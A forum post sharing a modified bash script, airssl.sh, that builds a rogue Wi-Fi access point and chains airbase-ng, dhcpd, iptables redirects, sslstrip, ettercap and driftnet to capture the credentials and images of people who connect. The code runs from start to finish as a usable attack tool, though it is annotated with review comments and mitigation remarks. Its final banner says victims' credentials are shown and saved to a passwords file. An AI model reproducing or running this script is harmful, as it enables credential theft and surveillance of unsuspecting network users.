
Thread: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh


    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I still don't have DHCP working, but I did hack this script up a bit as well. Hope you like my modifications.

    The biggest thing I wanted to add was a --cleanup process, so that it no longer messes things up for me while I troubleshoot the DHCP issue. I assume my problem is something with my wireless drivers and injection, even if it works elsewhere. Don't know yet.

    Code:
    #!/bin/bash
    # (C)opyright 2009 - killadaninja - Modified G60Jon 2010 - SpudGunMan 2010
    # airssl.sh - v1.2
    # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
    # Addressing that the script's DHCP server hands to clients of the fake AP.
    # These fixed values are what such a client sees in its lease, so they can
    # serve as indicators when an unexpected open network is being investigated.

    # Network address of the DHCP subnet.
    fakeAPnet='10.0.0.0'
    # Netmask of the DHCP subnet.
    fakeAPSubnetMask='255.255.255.0'
    # Address configured on at0; also advertised to clients as their gateway.
    fakeAPat0Address='10.0.0.1'
    # DNS server advertised to clients.
    fakeAPdns='8.8.8.8'
    # First and last address of the lease pool, separated by a space.
    fakeAPrange='10.0.0.20 10.0.0.50'
    
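    #######################################
    # Stop everything the script started and reset the host's network state.
    # Globals (read): fakeapid dchpid sslstripid ettercapid dritnetid
    #                 sslstriplogid fakeap_interface fakeap
    # Side effects:
    #   - sends SIGTERM to each recorded process id
    #   - stops monitor mode on the recorded interfaces
    #   - writes 0 to ip_forward, whatever its value was before the run
    #   - flushes ALL rules and user chains in the filter and nat tables,
    #     including rules that existed before the script ran; chain policies
    #     (the script sets FORWARD to ACCEPT) are not reset by a flush
    #   - removes the airssl-cleanup state file from the current directory
    # NOTE(review): nothing here removes the data written under
    # /pentest/wireless/airssl; it stays on disk after cleanup.
    # Never returns: the function ends with exit.
    #######################################
    CleanUp ()
    {
      local pid_var pid iface

      echo
      echo "[+] Cleaning up airssl and resetting iptables..."

      # A component that was never started leaves its *id variable unset, and
      # after "--cleanup" the values come from a file on disk. Only signal
      # values that are plain process ids, and never 0 or 1 (process group /
      # init). A saved pid may have been reused by an unrelated process by the
      # time a later "--cleanup" runs; that cannot be detected from here.
      for pid_var in fakeapid dchpid sslstripid ettercapid dritnetid sslstriplogid; do
        pid=${!pid_var-}
        case "$pid" in
          ''|*[!0-9]*|0*|1) continue ;;
        esac
        kill "$pid" 2>/dev/null || echo "[-] ${pid_var}=${pid} was not running" >&2
      done

      # Both names are stopped, as before: the interface given to airmon-ng
      # and the monitor interface it created.
      for iface in "$fakeap_interface" "$fakeap"; do
        if [ -n "$iface" ]; then
          airmon-ng stop "$iface"
        fi
      done

      echo "0" > /proc/sys/net/ipv4/ip_forward
      iptables --flush
      iptables --table nat --flush
      iptables --delete-chain
      iptables --table nat --delete-chain

      echo "[+] Check if clean up successful..."
      echo "[+] Thank you for using airssl, Good Bye..."
      rm -f -- airssl-cleanup
      exit
    }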
    
    # Interactive setup. Prints the default route and the airmon-ng status, then
    # asks for the gateway address, the uplink interface, the wireless interface
    # and the ESSID, and puts the wireless interface into monitor mode.
    # Sets the globals gatewayip, internet_interface, fakeap_interface, fakeap
    # and ESSID. None of the answers is validated here, and later parts of the
    # script pass several of them unquoted to iptables and airmon-ng.
    initalize(){
      # Reference output for answering the prompts below.
      printf '\n'
      printf '%s\n' "===========Internet Connection Information========="
      route -n -A inet | grep UG
      printf '%s\n' "====Airmon Check Output (Should be no errors)======"
      airmon-ng check
      printf '%s\n' "====Airmon Output (FakeAP Wireless Interface)======"
      airmon-ng
      printf '\n\n'

      read -r -p "Enter Default gateway IP address, this is listed above. example 192.168.1.254: " gatewayip
      read -r -p "Enter interface connected to the internet, this is listed above. example wlan0: " internet_interface
      read -r -p "Enter your interface to be used for the fake AP, for example wlan1: " fakeap_interface
      # Keep the physical interface name; fakeap_interface is overwritten below
      # with the monitor interface name.
      fakeap=$fakeap_interface
      read -r -p "Enter the ESSID you would like your rogue AP to be called: " ESSID

      # NOTE(review): the expansion is unquoted, so the answer is word-split.
      airmon-ng start $fakeap_interface
      read -r -p "Enter interface for fake AP, after airmon-ng processing example mon0: " fakeap_interface
    }
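    # Command line handling.
    #   --cleanup          reload the state saved by a previous run and undo it
    #   any other argument print a short usage text and exit
    #   no argument        continue with the interactive setup
    if [ "$1" = "--cleanup" ] ; then
      echo "[+] Previous Job Settings will be used"
      # The state file is looked up in the current directory and the script
      # presumably runs as root (it edits iptables and /proc/sys). Sourcing it
      # would execute whatever the file contains, so it is read as key=value
      # data instead: only the known keys are accepted, process ids must be
      # digits, and interface names are limited to a conservative character set.
      if [ -f airssl-cleanup ] && [ ! -L airssl-cleanup ]; then
        while IFS='=' read -r state_key state_value || [ -n "$state_key" ]; do
          case "$state_key" in
            fakeapid|dchpid|sslstripid|ettercapid|dritnetid|sslstriplogid)
              case "$state_value" in
                ''|*[!0-9]*) ;;   # not a process id: ignore the line
                *) printf -v "$state_key" '%s' "$state_value" ;;
              esac
              ;;
            fakeap_interface|fakeap)
              case "$state_value" in
                ''|-*|*[!A-Za-z0-9_.:-]*) ;;   # not an interface name: ignore
                *) printf -v "$state_key" '%s' "$state_value" ;;
              esac
              ;;
          esac
        done < airssl-cleanup
      else
        # CleanUp still runs so that forwarding and iptables are reset.
        echo "[-] no airssl-cleanup state file in $PWD, nothing to reload" >&2
      fi
      CleanUp
    elif [ -n "$1" ]; then
      echo
      echo "Fake AP with SSL Strip"
      echo "to cleanup last job run airssl.sh --cleanup"
      exit
    else
      echo "Fake AP - SSL Strip"
    fi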
    # Collect the settings interactively, echo them back and ask for one
    # confirmation.
    initalize
    echo
    # NOTE(review): the variables below sit outside the quotes, so their values
    # are word-split and glob-expanded before echo prints them.
    echo "Default/Networks Gateway: "$gatewayip
    echo "Default/Networks Gateway Interface: "$internet_interface
    echo "FakeAP ESSID: "$ESSID
    echo "FakeAP Fake Interface: "$fakeap_interface
    echo
    echo 
    read -r -n 1 -p "Is this information correct? (y/n)" ANSWER
    # NOTE(review): $ANSWER is unquoted; an empty answer makes the test itself
    # fail with a syntax error, which lands in the else branch.
    if [ $ANSWER = "y" ] ; then
    echo "[+] Settings will be used"
    else
    # Undo monitor mode and ask again. The second set of answers is used
    # without another confirmation.
    echo "[+] airmon cleanup"
    airmon-ng stop $fakeap_interface
    initalize
    fi
    
    # Write the dhcpd configuration for the fake AP subnet. The file is
    # overwritten on every run. Clients receive a lease from $fakeAPrange with
    # $fakeAPat0Address as router, $fakeAPdns as resolver, a 600 s default lease
    # and the ESSID as domain name; those values show up in a client's lease.
    mkdir -p "/pentest/wireless/airssl"
    # NOTE(review): the shell quotes are closed before $ESSID and reopened after
    # it, so $ESSID is expanded unquoted (word splitting and globbing apply) and
    # is copied into the config without escaping. An ESSID containing a double
    # quote or a semicolon changes the structure of dhcpd.conf.
    echo "authoritative;
    
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet $fakeAPnet netmask $fakeAPSubnetMask {
    option routers $fakeAPat0Address;
    option subnet-mask $fakeAPSubnetMask;
    
    option domain-name "\"$ESSID\"";
    option domain-name-servers $fakeAPdns;
    
    range $fakeAPrange;
    
    }" > /pentest/wireless/airssl/dhcpd.conf
    
    # Start airbase-ng in its own xterm. One keypress selects the mode:
    #   y  operator-supplied switches plus the chosen ESSID
    #   a  the "clone ALL probe requests" mode named in the prompt
    #   n  the chosen ESSID on channel 1
    # Any other key starts nothing and leaves fakeapid unset; the script carries
    # on regardless. In every branch $! is the process id of the xterm window,
    # not of the airbase-ng process running inside it.
    # Client-side exposure is to devices that join open networks automatically;
    # removing remembered open networks and disabling auto-join is the usual
    # mitigation.
    echo "[+] Configuring FakeAP...."
    read -r -n 1 -p "Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches, would you like Airbase to clone ALL probe requests
    choose n if your are unsure... y or n or (a)All?" ANSWER
    
    # NOTE(review): $ANSWER is unquoted in all three tests; an empty answer
    # makes each test fail with a syntax error instead of comparing.
    if [ $ANSWER = "y" ] ; then
    airbase-ng --help
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
    redefined, also in this mode you MUST define a channel "
    # NOTE(review): read without -r interprets backslashes in the answer.
    read -e aswitch
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "a" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "n" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    # Bring up at0 with the gateway address, add the route for the client
    # subnet, wipe the firewall and turn on IP forwarding.
    echo "[+] Configuring interface and clear tables..."
    ifconfig lo up
    # Started in the background; the one-second sleep is the only wait for it.
    ifconfig at0 up &
    sleep 1
    ifconfig at0 $fakeAPat0Address netmask $fakeAPSubnetMask
    ifconfig at0 mtu 1400
    route add -net $fakeAPnet netmask $fakeAPSubnetMask gw $fakeAPat0Address
    # These four commands delete every rule and user-defined chain in the
    # filter and nat tables, including whatever firewall the host had before.
    # NOTE(review): nothing saves the previous ruleset first (for example with
    # iptables-save), so the cleanup path cannot restore it; the same holds
    # for the previous value of ip_forward.
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    sleep 10
    
    # Start dhcpd3 on at0 in its own xterm, using the configuration generated
    # earlier in the script.
    echo "[+] Setting up DHCP..."
    # Pre-create the pid file and hand it to the dhcpd user.
    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid
    # $! is the process id of the xterm window, not of dhcpd3 itself;
    # presumably closing the window ends dhcpd3 as well - confirm.
    xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
    sleep 3
    
    # Install the forwarding and NAT rules, with or without the sslstrip
    # redirect, depending on one keypress.
    echo "[+] Configuring sslstrip..."
    read -r -n 1 -p "Would you like to Start SSLstrip?, y or n " STRIP
    echo
    # NOTE(review): $STRIP is unquoted; an empty answer makes the test fail with
    # a syntax error and the else branch runs.
    if [ $STRIP = "y" ] ; then
    echo "[+] Configuring iptables for sslstrip..."
    # This DNAT rule has no port or interface match: every UDP packet seen in
    # PREROUTING is rewritten to $gatewayip, not only DNS.
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
    # Changes the FORWARD chain policy. A later flush removes rules but does
    # not reset a chain policy.
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
    # Only TCP destination port 80 is redirected to local port 10000. Under
    # these rules, connections that start on port 443 are forwarded and not
    # redirected. HSTS (including preload lists) is the mitigation that keeps a
    # browser from making the initial plain-HTTP request this rule depends on.
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    echo "[+] Starting sslstrip..."
    # $! is the process id of the xterm window, not of sslstrip.
    xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
    sleep 2
    else
    # Plain routing for the clients; sslstripid stays unset in this branch.
    echo "[+] Configuring iptables without sslstrip..."
    iptables -X
    iptables -F
    iptables -A FORWARD -i at0 -o $internet_interface -m state --state NEW -j ACCEPT
    iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
    # No --out-interface here: the MASQUERADE rule applies to every interface.
    iptables -A POSTROUTING -t nat -j MASQUERADE
    fi
    
    # Start ettercap on at0 in its own xterm, either with operator-supplied
    # switches (y) or with the built-in command line (n). Any other key starts
    # nothing and leaves ettercapid unset.
    # The "n" command line writes its capture to
    # /pentest/wireless/airssl/passwords. That file holds other people's
    # credentials at a fixed path, is created with whatever umask is in
    # effect, and the script's cleanup does not delete it.
    echo "[+] Configuring ettercap..."
    echo
    read -r -n 1 -p "Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose n, y or n " ETTER
    # NOTE(review): $ETTER is unquoted in the tests below; an empty answer makes
    # each test fail with a syntax error instead of comparing.
    if [ $ETTER = "y" ] ; then
    ettercap --help
    fi
    
    if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
    For the sake of airssl, ettercap WILL USE -u and -p so you are advised
    NOT to use -M, also -i is already set and CANNOT be redifined here. 
    Ettercaps output will be saved to /pentest/wireless/airssl/passwords
    DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    # NOTE(review): read without -r interprets backslashes in the answer.
    read "eswitch"
    echo "[+] Starting ettercap..."
    # $! is the process id of the xterm window, not of ettercap.
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
    sleep 1
    fi
    
    if [ $ETTER = "n" ] ; then
    echo
    echo "[+] Starting ettercap..."
    # $! is the process id of the xterm window, not of ettercap.
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
    sleep 1
    fi
    
    # Optionally start driftnet on the uplink interface and, when sslstrip was
    # selected earlier, open a window that follows its log.
    # The driftnet output directory receives image data taken from client
    # traffic; like the ettercap capture file it is sensitive third-party data
    # that the script's cleanup leaves on disk.
    echo
    echo "[+] Driftnet?"
    echo
    read -r -n 1 -p "Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), y or n " DRIFT
    
    # NOTE(review): $DRIFT is unquoted; an empty answer makes the test fail
    # with a syntax error instead of comparing.
    if [ $DRIFT = "y" ] ; then
    mkdir -p "/pentest/wireless/airssl/driftnetdata"
    echo "[+] Starting driftnet..."
    # driftnet runs directly in the background, so here $! is its own pid.
    driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
    sleep 3
    fi
    
    
    if [ $STRIP = "y" ] ; then
    echo "[+] Starting sslstrip logging..."
    # sslstrip.log is a relative path: it is looked up in the directory the
    # script was started from. $! is the process id of the xterm window.
    xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
    sleep 2
    fi
    
    
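    # Final status screen and the cleanup prompt. The answer is stored in WISH
    # and evaluated by the code that follows.
    # Both paths named in the banner hold data captured from client traffic and
    # stay on disk after cleanup. The driftnet path is spelled the way the
    # script creates it (driftnetdata); the banner previously named a directory
    # that the script never writes to.
    clear
    echo
    echo "[+] Activated..."
    echo "Airssl is now running, after victim connects and surfs their credentials 
    will be displayed in ettercap. You may use right/left mouse buttons 
    to scroll up/down ettercaps xterm shell, ettercap will also save its output 
    to /pentest/wireless/airssl/passwords unless you stated otherwise. 
    Driftnet images will be saved to /pentest/wireless/airssl/driftnetdata "
    echo
    echo "[+] IMPORTANT..."
    echo
    echo "After you have finished please close airssl and clean up properly by hitting y"
    echo "if airssl is not cleaned up properly ERRORS WILL OCCUR"
    echo "otherwise you can clean up later with the airssl --cleanup command"
    read -r -n 1 -p "(press y to cleanup now)" WISH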
    
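    # Either clean up now, or save what "--cleanup" needs for a later run.
    if [ "$WISH" = "y" ] ; then
      CleanUp
    else
      # The state file is written to the current directory and read back by a
      # later run that presumably has root privileges. Remove any existing entry
      # first so that a symlink left under that name is not followed, and create
      # the file readable and writable by its owner only. The file format is
      # unchanged: one comment line followed by key=value lines.
      rm -f -- airssl-cleanup
      (
        umask 077
        {
          printf '%s\n' "#cleanup process information"
          printf 'fakeapid=%s\n' "$fakeapid"
          printf 'dchpid=%s\n' "$dchpid"
          printf 'sslstripid=%s\n' "$sslstripid"
          printf 'ettercapid=%s\n' "$ettercapid"
          printf 'dritnetid=%s\n' "$dritnetid"
          printf 'sslstriplogid=%s\n' "$sslstriplogid"
          printf 'fakeap_interface=%s\n' "$fakeap_interface"
          printf 'fakeap=%s\n' "$fakeap"
        } > airssl-cleanup
      )
    fi

    exit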
    Last edited by spudgunman; 11-15-2010 at 06:51 PM. Reason: fix typo
